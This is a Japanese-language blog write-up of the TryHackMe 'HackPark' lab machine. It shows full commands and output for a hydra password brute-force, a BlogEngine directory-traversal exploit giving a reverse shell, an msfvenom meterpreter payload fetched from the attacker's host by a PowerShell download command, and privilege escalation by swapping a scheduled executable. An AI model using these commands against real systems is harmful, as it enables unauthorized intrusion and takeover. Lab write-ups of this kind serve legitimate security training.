【TryHackMe write-up】HackPark

May 04, 2020

はじめに

TryHackMe という Hack the Box のようなサービスを最近やっています。 https://tryhackme.com/

その中の HackPark という machine をやっていきます。

(途中から画像が混じってるのはなぜか Kali のコピペが途中で効かなくなったからです…)

cheat sheet

以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET

nmap

[email protected]:~$ nmap -sV -sC 10.10.205.29
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-03 12:37 EDT
Nmap scan report for 10.10.205.29
Host is up (0.29s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 6 disallowed entries 
| /Account/*.* /search /search.aspx /error404.aspx 
|_/archive /archive.aspx
|_http-server-header: Microsoft-IIS/8.5
|_http-title: hackpark | hackpark amusements
3389/tcp open  ssl/ms-wbt-server?
|_ssl-date: 2020-05-03T16:38:30+00:00; +1s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.25 seconds

hydra

[email protected]:~$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.205.29 http-form-post "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=yP%2BzZRxWm7TkECRpYR3xwyRQYtrSszztGRNL4Uz9mctXTcwgfc1qtLY75IX1jHp0HBOCW28lEF5tb%2BktOBtj0SvgoywSBQKL7%2FKJZIHtxXUJVmQvNfEY%2Fq8bLMW7GBXwZ2zCppergFAlHYy8GsmMHW5lrR7w5QqkuUN6ltqTthT8QNUGGZSatX%2F%2FoJCgDZ86oPs93zkwRW0MPVsr7NXTrNZ2KfrEPkMX1%2BsztKZ3dsdI2NG0uLiRSaHKhzwJMrF5OvosCFxofyf61XMfVJkZdWOtsLvWCq9EAt7gS%2BIOXntnaLiot0g%2FYn8pbxC%2Bbq3WEvXX3chl2wGEG8ruqZyMgy8%2BejIN0YpW8OuwcW5tV%2FJmHLlT&__EVENTVALIDATION=k0kn6DqmKUOJ%2B6N01uhNQe5F%2BcmhCqbUvlNVFkf%2BJRFXXYWAkhK3vlUrmM2UP%2F5IMDuOe1xqGkRIqurysUyg8t0T2zCDeuwv%2FZPfVcCdBDiWBaG2TFXif8nB8Xp0iAgP56Rd%2FENNzNEj01U7YAYX2f7fvPpsICyxn1r1st8N9aFCrWcQ&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-03 14:23:06

[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.205.29:80/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=yP%2BzZRxWm7TkECRpYR3xwyRQYtrSszztGRNL4Uz9mctXTcwgfc1qtLY75IX1jHp0HBOCW28lEF5tb%2BktOBtj0SvgoywSBQKL7%2FKJZIHtxXUJVmQvNfEY%2Fq8bLMW7GBXwZ2zCppergFAlHYy8GsmMHW5lrR7w5QqkuUN6ltqTthT8QNUGGZSatX%2F%2FoJCgDZ86oPs93zkwRW0MPVsr7NXTrNZ2KfrEPkMX1%2BsztKZ3dsdI2NG0uLiRSaHKhzwJMrF5OvosCFxofyf61XMfVJkZdWOtsLvWCq9EAt7gS%2BIOXntnaLiot0g%2FYn8pbxC%2Bbq3WEvXX3chl2wGEG8ruqZyMgy8%2BejIN0YpW8OuwcW5tV%2FJmHLlT&__EVENTVALIDATION=k0kn6DqmKUOJ%2B6N01uhNQe5F%2BcmhCqbUvlNVFkf%2BJRFXXYWAkhK3vlUrmM2UP%2F5IMDuOe1xqGkRIqurysUyg8t0T2zCDeuwv%2FZPfVcCdBDiWBaG2TFXif8nB8Xp0iAgP56Rd%2FENNzNEj01U7YAYX2f7fvPpsICyxn1r1st8N9aFCrWcQ&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed
[STATUS] 536.00 tries/min, 536 tries in 00:01h, 14343863 to do in 446:01h, 16 active
[80][http-post-form] host: 10.10.205.29   login: admin   password: 1qaz2wsx
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-03 14:25:35

admin/1qaz2wsx でログインできそうです

initial access

スクリーンショット 2020-05-04 3.42.33.png

blogengine.net の version3.3.6.0 にはディレクトリトラバーサルの脆弱性があります。

スクリーンショット 2020-05-04 21.34.56.png https://www.exploit-db.com/exploits/46353

この exploit を使用します。

スクリーンショット 2020-05-04 21.55.49.png /admin/app/editor/editpost.cshtml の file manager から exploit(LHOST, LPORT を設定)を PostView.ascx として upload し、/?theme=../../App_Data/files にアクセスすることで exploit が実行されます

nc で待ち構えておくと shell をゲットできます。

[email protected]:~$ nc -lnvp 4445
listening on [any] 4445 ...
connect to [10.9.27.249] from (UNKNOWN) [10.10.138.175] 51217
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>

meterpreterに繋ぎかえる

msfvenom で生成し、

[email protected]:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.27.249 LPORT=1111 -f exe -o sheshe.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload                                                                                         
[-] No arch selected, selecting arch: x86 from the payload                                                                                                                     
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Saved as: sheshe.exe
[email protected]:~$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...

先ほど取得した shell から DL して

C:\Users\Public>
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.9.27.249:8000/sheshe.exe','sheshe.exe')"

C:\Users\Public>
dir
C:\Users\Public>dir
 Volume in drive C has no label.
 Volume Serial Number is 0E97-C552
 Directory of C:\Users\Public
05/04/2020  02:23 AM    <DIR>          .
05/04/2020  02:23 AM    <DIR>          ..
08/22/2013  08:39 AM    <DIR>          Documents
08/22/2013  08:39 AM    <DIR>          Downloads
05/04/2020  02:23 AM    <DIR>          Microsoft
08/22/2013  08:39 AM    <DIR>          Music
08/22/2013  08:39 AM    <DIR>          Pictures
05/04/2020  02:23 AM            73,802 sheshe.exe
08/22/2013  08:39 AM    <DIR>          Videos
               1 File(s)         73,802 bytes
               8 Dir(s)  39,054,577,664 bytes free

metasploit で multi/handler を待ち構えさせ、

msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.9.27.249      yes       The listen address (an interface may be specified)
   LPORT     1111             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.9.27.249:1111

DL したスクリプトを実行というおなじみの流れで、

powershell "Start-Process "sheshe.exe" 
c:\Users\Public>powershell "Start-Process "sheshe.exe"

meterpreter に繋ぎかえられます。

[*] Started reverse TCP handler on 10.9.27.249:1111 
[*] Sending stage (180291 bytes) to 10.10.138.175
[*] Meterpreter session 1 opened (10.9.27.249:1111 -> 10.10.138.175:51236) at 2020-05-04 05:28:09 -0400

meterpreter > 

windows-exploit-suggester.pyを使う

[email protected]:~$ ./windows-exploit-suggester.py --systeminfo sys.txt --database 2020-02-24-mssb.xls
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 8 hotfix(es) against the 266 potential bulletins(s) with a database of 137 known exploits
[*] there are now 249 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2012 R2 64-bit'
[*] 
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*]   https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*]   https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*]   https://github.com/tinysec/public/tree/master/CVE-2016-7255
[*] 
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*]   https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
[*] 
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*]   https://github.com/foxglovesec/RottenPotato
[*]   https://github.com/Kevin-Robertson/Tater
[*]   https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
[*]   https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation
[*] 
[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[*]   https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074), PoC
[*]   https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC
[*] 
[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[*]   https://www.exploit-db.com/exploits/39994/ -- Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063), PoC
[*] 
[E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important
[*]   https://www.exploit-db.com/exploits/40107/ -- MS16-032 Secondary Logon Handle Privilege Escalation, MSF
[*]   https://www.exploit-db.com/exploits/39574/ -- Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032), PoC
[*]   https://www.exploit-db.com/exploits/39719/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell), PoC
[*]   https://www.exploit-db.com/exploits/39809/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#)
[*] 
[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important
[*]   https://www.exploit-db.com/exploits/40085/ -- MS16-016 mrxdav.sys WebDav Local Privilege Escalation, MSF
[*]   https://www.exploit-db.com/exploits/39788/ -- Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2), PoC
[*]   https://www.exploit-db.com/exploits/39432/ -- Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1), PoC
[*] 
[E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important
[*]   Windows 7 SP1 x86 - Privilege Escalation (MS16-014), https://www.exploit-db.com/exploits/40039/, PoC
[*] 
[E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important
[*]   https://www.exploit-db.com/exploits/39232/ -- Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007), PoC
[*]   https://www.exploit-db.com/exploits/39233/ -- Microsoft Office / COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007), PoC
[*] 
[E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution (3116162) - Important
[*]   https://www.exploit-db.com/exploits/38968/ -- Microsoft Office / COM Object DLL Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132), PoC
[*]   https://www.exploit-db.com/exploits/38918/ -- Microsoft Office / COM Object els.dll DLL Planting (MS15-134), PoC
[*] 
[E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical
[*]   https://www.exploit-db.com/exploits/39698/ -- Internet Explorer 9/10/11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)
[*] 
[E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege (3096447) - Important
[*]   https://www.exploit-db.com/exploits/38474/ -- Windows 10 Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111), PoC
[*] 
[E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important
[*]   https://www.exploit-db.com/exploits/38202/ -- Windows CreateObjectTask SettingsSyncDiagnostics Privilege Escalation, PoC
[*]   https://www.exploit-db.com/exploits/38200/ -- Windows Task Scheduler DeleteExpiredTaskAfter File Deletion Privilege Escalation, PoC
[*]   https://www.exploit-db.com/exploits/38201/ -- Windows CreateObjectTask TileUserBroker Privilege Escalation, PoC
[*] 
[E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (3089656) - Critical
[*]   https://www.exploit-db.com/exploits/38198/ -- Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation, PoC
[*]   https://www.exploit-db.com/exploits/38199/ -- Windows NtUserGetClipboardAccessToken Token Leak, PoC
[*] 
[M] MS15-078: Vulnerability in Microsoft Font Driver Could Allow Remote Code Execution (3079904) - Critical
[*]   https://www.exploit-db.com/exploits/38222/ -- MS15-078 Microsoft Windows Font Driver Buffer Overflow
[*] 
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[*]   https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
[*]   https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
[*] 
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[*]   http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC
[*] 
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[*]   https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC
[*]   http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*]   http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC
[*]   http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF
[*]   http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF
[*]   http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF
[*] 
[M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) - Important
[*]   http://www.exploit-db.com/exploits/35055/ -- Windows OLE - Remote Code Execution 'Sandworm' Exploit (MS14-060), PoC
[*]   http://www.exploit-db.com/exploits/35020/ -- MS14-060 Microsoft Windows OLE Package Manager Code Execution, MSF
[*] 
[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important
[*]   https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC
[*]   https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC
[*] 
[E] MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical
[E] MS14-029: Security Update for Internet Explorer (2962482) - Critical
[*]   http://www.exploit-db.com/exploits/34458/
[*] 
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
[*]   http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote Command Execution, PoC
[*] 
[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important
[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[*] done

TryHackMe の設問のためにやりましたがその後この結果を使うことはありませんでした。()

winPEAS.bat

meterpreter の upload コマンドを使って upload し、 スクリーンショット 2020-05-04 20.53.20.png .\winPEAS.datで実行します。

プロセスのあたりに注目します。 スクリーンショット 2020-05-04 20.53.51.png ぱっと見の名前では怪しそうなものは(僕的には)ありませんでしたが、admin が何かしらを定期実行してて、その定期実行ファイルを入れ替えるというのはありがちな流れなので、scheduler あたりを調べてみます。

C:\Program Files (x86)\SystemScheduler内に WScheduler.exe があります。 スクリーンショット 2020-05-04 20.55.21.png

log ファイルを調べていくと C:\Program Files (x86)\SystemScheduler\Events\20198415519.INI_LOG.txt をみてみると、

スクリーンショット 2020-05-04 20.59.19.png

このように Message.exe が定期実行されていることがわかります。 なので C:\Program Files (x86)\SystemScheduler\Message.exe を先ほど meterpreter に繋ぎかえる時に使った sheshe.exe に置き換えてもう一度 multi/handler で待ち構えます。

スクリーンショット 2020-05-04 21.05.19.png

Administrator の shell を取得できます。

終わりに

サクッと書いてますが、怪しいプロセス探す&log 見るのあたりはかなり苦戦しました。

精進します

このエントリーをはてなブックマークに追加